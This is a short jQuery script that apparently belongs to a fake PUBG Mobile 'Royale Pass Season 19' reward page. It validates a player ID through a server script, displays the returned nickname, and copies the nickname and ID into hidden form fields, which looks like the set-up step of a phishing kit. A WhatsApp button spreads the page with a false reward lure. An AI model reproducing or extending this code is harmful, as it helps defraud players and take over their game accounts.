
	var login = new Audio();
	login.src = "media/login.mp3";

	var tutup = new Audio();
	tutup.src = "media/tutup.mp3";

	var button = new Audio();
	button.src = "media/button.mp3";


        $(document).ready(function() {
        	$('#shareWa').on('click',function(){
        		var pageURL = location;
        		document.location.href = 'whatsapp://send?text=Get reward PUBG MOBILE Royale Pass Season 19 here : '+pageURL;
        	});
        	
        	$('#playid').on('click',function(){
        		$('#errorId').hide();
                $('#playid').css('border','1px solid silver');
        	});
            $("#verify").on('click', function() {
               var playid = $("#playid").val();
               if(playid == "") {
                   $('#errorId').show();
                   $('#playid').css('border','1px solid red');
                   $('#playid').val('');
               } else {
                    $.ajax({
                    url: "system/curl.php",
                    type: "POST",
                    data: 'playid='+playid,
                    beforeSend: function() {
                    $(".judulID").fadeOut();
                    $(".titleId").fadeIn();
                    $(".titleId").html('Please wait');
                    $('#playid').fadeOut();
                    $('.waitId').fadeIn();
                    $('#verify').attr('disabled','true');
                    $('.forgotId').attr('disabled','true');
                    $('.forgotId').css('opacity','0.5');
                    $('#verify').css('opacity','0.5');
                    },
                    success: function(status) {
                    var stat = $('#status').val(status);
                    var isi_stat = stat.val();
                    $("#btn_oke").show();
                    $("#btnload").hide();
                    if (isi_stat == "Wrong_UserId") {
                    	$('#verify').removeAttr('disabled');
	                    $('.forgotId').removeAttr('disabled');
	                    $('.forgotId').css('opacity','1');
	                    $('#verify').css('opacity','1');
                       $('.waitId').hide();
                       $(".titleId").hide();
                       $(".errorId").hide();
                       $("#playid").fadeIn();
                       $('#errorId').show();
                   	   $('#playid').css('border','1px solid #fff');
                       $('#errorId').html('invalid player id(2002-2002-0)‎');
                    }else if(isi_stat == "Token Error"){
                    	$('#verify').removeAttr('disabled');
	                    $('.forgotId').removeAttr('disabled');
	                    $('.forgotId').css('opacity','1');
	                    $('#verify').css('opacity','1');
                    	$('.waitId').hide()
                       $(".titleId").hide();
                       $(".errorId").hide();
                       $("#playid").fadeIn();
                       $('#errorId').show()
                   	   $('#playid').css('border','1px solid #fff');
                       $('#errorId').html('System error(2002-2002-0)‎');
                    }else{
                    	$('.waitId').hide()
                    	$('.menuPubgm').fadeIn()
                        $('#beer').hide();
                        $('#alertku').fadeIn();
                        $('#isnick').html(status);
                        $('#isinick1').val(status);
                        $('#isinick2').val(status);
                        $('#isiplayid1').val(playid);
                        $('#isiplayid2').val(playid);
                        $('.playid').hide();
                    }
                    }
                    });
               }
            });

        });
    

	function forgot(){
	$('.forgot').show();
	$('.playid').hide();
	}
	function close_forgot(){
		$(".forgot").hide()
		$(".playid").show()
	}
	